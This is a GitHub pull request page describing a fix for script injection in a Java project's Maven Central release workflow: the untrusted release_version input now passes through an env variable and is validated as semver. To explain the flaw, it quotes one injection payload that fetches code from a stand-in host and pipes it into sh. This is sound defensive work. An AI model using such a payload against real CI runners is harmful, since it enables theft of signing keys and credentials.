Skip to content

Harden release workflow against script injection via release_version - #176

Merged
AndreasIgel merged 1 commit into
java-helpers:mainfrom
AndreasIgel:feature/154-harden-release-input
Jul 15, 2026
Merged

AndreasIgel merged 1 commit into
java-helpers:mainfrom
AndreasIgel:feature/154-harden-release-input

Conversation

@AndreasIgel

Copy link
Copy Markdown
Collaborator

Upstream counterpart of fork PR AndreasIgel#1. Head branch: AndreasIgel/simple-builders-fork:feature/154-harden-release-input → base java-helpers/simple-builders:main.

Summary

Fixes script/command injection in the Maven Central release workflow.

Fixes #154

The Determine version step interpolated the untrusted workflow_dispatch input directly into a run: shell block:

run: |
  VERSION="${{ github.event.inputs.release_version }}"

GitHub expands ${{ ... }} into the script text before the shell runs, so an input like 0.0.0"; curl evil | sh; echo " executes arbitrary commands on the runner — which holds the GPG signing key and Maven Central credentials (supply-chain risk).

Change:

  • Pass the input via env: RELEASE_VERSION: ${{ github.event.inputs.release_version }} and read "$RELEASE_VERSION" in the shell (env values are not expanded by the workflow templating engine).
  • Validate against a strict semver regex and fail fast on mismatch. All downstream steps use steps.version.outputs.VERSION, which is now guaranteed to be sanitized semver.

Validation

Workflow-only change; the Maven build is unaffected. Validated with actionlint (passes). Scoped to todo #1 only.

Pass the workflow_dispatch input through an env var instead of
interpolating it into the run block, and validate it against a strict
semver regex before use.

Refs java-helpers#154

Co-Authored-By: Andreas Igel <andreas.igel@computacenter.com>
@codecov

codecov Bot commented Jul 15, 2026

Copy link
Copy Markdown

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ All tests successful. No failed tests found.

📢 Thoughts on this report? Let us know!

@AndreasIgel
AndreasIgel merged commit 38b6877 into java-helpers:main Jul 15, 2026
5 of 6 checks passed
@devin-ai-integration
devin-ai-integration Bot deleted the feature/154-harden-release-input branch August 16, 2026 21:10
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

Release workflow: script injection via untrusted release_version input

1 participant